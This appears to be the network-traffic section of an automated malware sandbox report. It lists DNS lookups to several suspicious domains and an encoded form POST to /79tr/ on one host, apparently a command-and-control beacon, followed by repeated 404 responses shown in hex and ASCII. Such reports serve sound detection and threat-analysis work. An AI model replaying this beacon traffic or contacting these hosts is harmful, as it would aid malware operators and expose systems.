                Source: global trafficDNS traffic detected: DNS query: www.030002128.xyz
                Source: global trafficDNS traffic detected: DNS query: www.auto-deals-cz-000.buzz
                Source: global trafficDNS traffic detected: DNS query: www.bzxs.info
                Source: global trafficDNS traffic detected: DNS query: www.econsultoria.online
                Source: unknownHTTP traffic detected: POST /79tr/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.beingandbecoming.ltdConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 208Cache-Control: no-cacheOrigin: http://www.beingandbecoming.ltdReferer: http://www.beingandbecoming.ltd/79tr/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36Data Raw: 44 44 70 3d 69 44 51 55 32 4b 54 52 48 6b 51 49 38 74 32 63 56 55 6e 67 47 33 6d 37 43 62 68 33 39 57 50 49 52 36 32 77 2f 55 6d 4b 62 45 69 66 76 6f 5a 79 59 4b 38 48 38 56 68 6f 79 69 64 59 31 63 49 68 64 4c 41 6c 75 57 30 54 69 38 6e 55 65 58 70 51 59 62 39 4e 38 78 39 63 4b 43 4a 74 4b 59 44 50 42 6b 32 63 4d 37 79 68 34 65 55 52 36 2b 71 37 74 32 42 52 4a 48 63 50 4c 63 2f 36 73 38 34 71 6c 41 34 77 4f 6d 73 67 30 43 4a 79 51 4f 4d 63 6e 38 55 52 4d 69 52 56 4d 4f 41 44 4b 30 5a 67 57 35 2b 47 59 36 57 75 36 70 72 6d 2b 68 64 4b 79 4d 36 47 5a 72 64 34 38 62 72 4a 52 41 78 32 38 45 66 35 42 43 54 77 68 37 47 7a Data Ascii: DDp=iDQU2KTRHkQI8t2cVUngG3m7Cbh39WPIR62w/UmKbEifvoZyYK8H8VhoyidY1cIhdLAluW0Ti8nUeXpQYb9N8x9cKCJtKYDPBk2cM7yh4eUR6+q7t2BRJHcPLc/6s84qlA4wOmsg0CJyQOMcn8URMiRVMOADK0ZgW5+GY6Wu6prm+hdKyM6GZrd48brJRAx28Ef5BCTwh7Gz
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:40:12 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:40:15 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:40:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:40:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 06 Nov 2024 07:40:53 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 06 Nov 2024 07:40:56 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 06 Nov 2024 07:41:01 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:21 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:24 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:26 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "669137aa-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
